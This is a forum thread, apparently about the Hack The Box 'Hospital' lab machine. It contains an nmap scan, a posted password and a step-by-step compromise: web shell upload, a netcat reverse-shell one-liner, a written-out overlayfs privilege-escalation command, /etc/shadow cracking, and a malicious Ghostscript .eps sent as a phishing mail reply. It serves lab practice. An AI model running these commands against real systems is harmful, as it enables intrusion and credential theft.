Posts: 10
Threads: 0
Joined: Oct 2023
I just rooted this box thanks to you guys. But what I'm still trying to figure out is why the port 8080 shows up on the nmap scan of the 192.168.5.1 host even tho the web application is running on the 192.168.5.2 host, can anyone explain?
Posts: 1
Threads: 0
Joined: Nov 2023
(Nov 19, 2023, 12:42 PM)take1312 Wrote: (Nov 19, 2023, 12:14 PM)nenandjabhata Wrote: (Nov 19, 2023, 11:21 AM)hcker01 Wrote: (Nov 19, 2023, 07:49 AM)m1lk Wrote: (Nov 19, 2023, 06:23 AM)hcker01 Wrote: you can write in a special folder and you gain admin
which folder? xampp/htdocs
Can you detaille for administrator please
Webserver hosts files in this folder (check the names and see if you can access them)
-> yes you can (e.g. index.php via https)
upload shell there
acess it
recieve root shell
When I upload a php shell half of the php gets turned into regular text and I don't understand how to fix this. Could someone help?
Posts: 56
Threads: 4
Joined: Sep 2023
(Nov 19, 2023, 06:27 PM)0penEye Wrote: (Nov 19, 2023, 12:42 PM)take1312 Wrote: (Nov 19, 2023, 12:14 PM)nenandjabhata Wrote: (Nov 19, 2023, 11:21 AM)hcker01 Wrote: (Nov 19, 2023, 07:49 AM)m1lk Wrote: which folder? xampp/htdocs
Can you detaille for administrator please
Webserver hosts files in this folder (check the names and see if you can access them)
-> yes you can (e.g. index.php via https)
upload shell there
acess it
recieve root shell
When I upload a php shell half of the php gets turned into regular text and I don't understand how to fix this. Could someone help? read the post maybe? the working shell is in here already as well as the file format
Posts: 16
Threads: 0
Joined: Oct 2023
wait for scripts to run then you can see the administrator's password. I recommend RDP to the target machine.
Posts: 78
Threads: 24
Joined: Nov 2023
(Nov 19, 2023, 07:33 PM)take1312 Wrote: (Nov 19, 2023, 06:27 PM)0penEye Wrote: (Nov 19, 2023, 12:42 PM)take1312 Wrote: (Nov 19, 2023, 12:14 PM)nenandjabhata Wrote: (Nov 19, 2023, 11:21 AM)hcker01 Wrote: xampp/htdocs
Can you detaille for administrator please
Webserver hosts files in this folder (check the names and see if you can access them)
-> yes you can (e.g. index.php via https)
upload shell there
acess it
recieve root shell
When I upload a php shell half of the php gets turned into regular text and I don't understand how to fix this. Could someone help? read the post maybe? the working shell is in here already as well as the file format No, the working shell is not visible to me in /xampp/htdocs.
Posts: 2
Threads: 0
Joined: Nov 2023
(Nov 18, 2023, 07:06 PM)take1312 Wrote: nmmap slow as fuck
loginpage for mailer at https
Not shown: 65506 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
| ssh-hostkey:
| 256 e1:4b:4b:3a:6d:18:66:69:39:f7:aa:74:b3:16:0a:aa (ECDSA)
|_ 256 96:c1:dc:d8:97:20:95:e7:01:5f:20:a2:43:61:cb:ca (ED25519)
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-11-19 02:04:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS C, DNSC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after: 2028-09-06T10:49:03
443/tcp open ssl/http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_ssl-date: TLS randomness does not represent time
|_http-title: Hospital Webmail :: Welcome to Hospital Webmail
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNSC, DNSC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after: 2028-09-06T10:49:03
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNSC, DNSC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after: 2028-09-06T10:49:03
3269/tcp open globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNSC, DNSC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after: 2028-09-06T10:49:03
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HOSPITAL
| NetBIOS_Domain_Name: HOSPITAL
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: hospital.htb
| DNS_Computer_Name: DC.hospital.htb
| DNS_Tree_Name: hospital.htb
| Product_Version: 10.0.17763
|_ System_Time: 2023-11-19T02:05:04+00:00
| ssl-cert: Subject: commonName=DC.hospital.htb
| Not valid before: 2023-09-05T18:39:34
|_Not valid after: 2024-03-06T18:39:34
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6404/tcp open msrpc Microsoft Windows RPC
6406/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
6407/tcp open msrpc Microsoft Windows RPC
6409/tcp open msrpc Microsoft Windows RPC
6614/tcp open msrpc Microsoft Windows RPC
6625/tcp open msrpc Microsoft Windows RPC
6638/tcp open msrpc Microsoft Windows RPC
8080/tcp open tcpwrapped
| http-title: Login
|_Requested resource was login.php
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.55 (Ubuntu)
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-11-19T02:05:09
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 227.61 seconds
once you create an account
http://hospital.htb:8080/login.php
register.php
you can upload files here
.php did not work but .ps1 does
access files via /uploads/filename what file did you upload i tried pownyshell uploaded but did not work
Posts: 3
Threads: 0
Joined: Oct 2023
Nov 21, 2023, 12:52 PM
(This post was last modified: Nov 21, 2023, 12:55 PM by hacker705.)
Can anybody tell me which Windows service is running Ubuntu and the web application on port 8080?
(I already have the administrator flag - I just want to learn.)
For some reason, netstat doesn't list port 8080. Also, I couldn't find WSL or Docker (no wsl or docker commands available) or any other relevant process/service. I stopped the apache service, but that only stopped the web application on port 443.
Posts: 3
Threads: 0
Joined: Sep 2023
Nov 21, 2023, 03:42 PM
(This post was last modified: Nov 21, 2023, 03:45 PM by Mia2024.)
(Nov 18, 2023, 11:36 PM)Miranda0315 Wrote: (Nov 18, 2023, 11:33 PM)Atomic2 Wrote: (Nov 18, 2023, 11:14 PM)theart42 Wrote: (Nov 18, 2023, 10:29 PM)take1312 Wrote: password is
qwe123!@#
gl folks i´m out machine reverting every 10 mins. dam apes
and now we phish
Tried generating rev shell with ghostscript multiple times but it never hits use this shell: https://github.com/flozz/p0wny-shell/blo.../shell.php
change the file extension to .phar, then upload it to the website, and visit /uploads/shell.phar
thanks bro
(Nov 19, 2023, 12:45 AM)take1312 Wrote: Okay here is short summary on what to do:
upload:
https://github.com/flozz/p0wny-shell
acces via web /uploads/filename
get shell as www-data in browser
get to netcat shell with rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc yourip 443 >/tmp/f
get root shell with
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("bash -i")'
check here:
https://www.reddit.com/r/selfhosted/comm...e20232640/
get /etc/shadow and creck drwilliams password
use drwilliams password to login on https (the mail application)
with drwilliams@hospital.htb
and his password
read the mail in the inbox
use this exploit https://github.com/jakabakos/CVE-2023-36...-injection
to craft an malicious .eps file
send this as answer to the mail
-> you get an user shell on hospital
get user flag
root can you find out yourself easily
gave some insights 
Posts: 47
Threads: 4
Joined: Nov 2023
Nov 21, 2023, 06:28 PM
(This post was last modified: Nov 21, 2023, 06:32 PM by jahman.)
Hello everyone,
Just another maniers to root the box:
- On the ubuntu hyper-v, you can also privescv to root with the CVE-2023-35001.
- On the windows machine, you can find the drbrown pass in the "C:/users/drbrown.HOSPITAL/Documents/ghostscript.bat".
- With the winpeas exe version, it shows up a scheduled task that run : (HOSPITAL\Administrator) OneDriveUpdate: powershell.exe -c "python.exe C:\Windows\System32\SyncAppvPublicationServer.vbs", the vbs/python script is readable and contains the admin password
Posts: 3
Threads: 0
Joined: Oct 2023
(Nov 21, 2023, 12:52 PM)hacker705 Wrote: Can anybody tell me which Windows service is running Ubuntu and the web application on port 8080?
(I already have the administrator flag - I just want to learn.)
For some reason, netstat doesn't list port 8080. Also, I couldn't find WSL or Docker (no wsl or docker commands available) or any other relevant process/service. I stopped the apache service, but that only stopped the web application on port 443.
To answer my own question, Hyper-V Manager is available via RDP and there is the Ubuntu VM.
|
